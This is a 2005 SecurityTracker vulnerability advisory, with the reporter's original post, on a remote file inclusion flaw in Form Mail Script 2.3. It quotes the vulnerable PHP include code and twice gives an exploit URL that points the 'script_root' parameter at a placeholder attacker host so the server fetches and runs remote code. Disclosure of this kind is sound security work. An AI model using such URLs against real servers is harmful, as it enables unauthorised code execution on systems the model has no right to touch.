Form Mail Script Lets Remote Users Include and Execute Arbitrary PHP Code
|
|
SecurityTracker Alert ID: 1013378
|
|
SecurityTracker URL: http://securitytracker.com/id?1013378
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 5 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2.3 and prior versions
|
Description: A vulnerability was reported in Form Mail Script. A remote user can execute arbitrary commands on the target system.
The 'inc/formmail.inc.php' script does not properly validate user-supplied input in the 'script_root' parameter. A remote user can
supply a specially crafted URL to cause the target server to include and execute arbitrary PHP code from a remote server. The code,
including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[dir]/inc/form
mail.inc.php?script_root=http://[attacker]/
This exploit works if register_globals and allow_url_fopen are set to 'on'.
The
vendor has been notified.
Filip Groszynski reported this vulnerability.
|
Impact: A remote user can execute arbitrary PHP code and operating commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.stadtaus.com/php_scripts/formmail_script/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Filip Groszynski <groszynskif@gmail.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Fri, 04 Mar 2005 17:26:08 +0000
From: Filip Groszynski <groszynskif@gmail.com>
Subject: PHP Form Mail Script (2.3) - Arbitrary File Inclusion (VXSfx)
|
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: Form Mail Script (FS)
Version: <= 2.3 (free/commercial)
Homepage: http://www.stadtaus.com/
Author: Filip Groszynski (VXSfx)
Date: 4 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Vulnerable code in inc/formmail.inc.php:
...
/*****************************************************
** Include functions
*****************************************************/
include $script_root . 'inc/functions.inc.php';
include $script_root . 'inc/template.class.inc.php';
include $script_root . 'inc/template.ext.class.inc.php';
include $script_root . 'inc/formmail.class.inc.php';
...
include $script_root . 'languages/language.' . $language . '.inc.php';
...
--------------------------------------------------------
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified.
--------------------------------------------------------
Contact:
Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
|
|
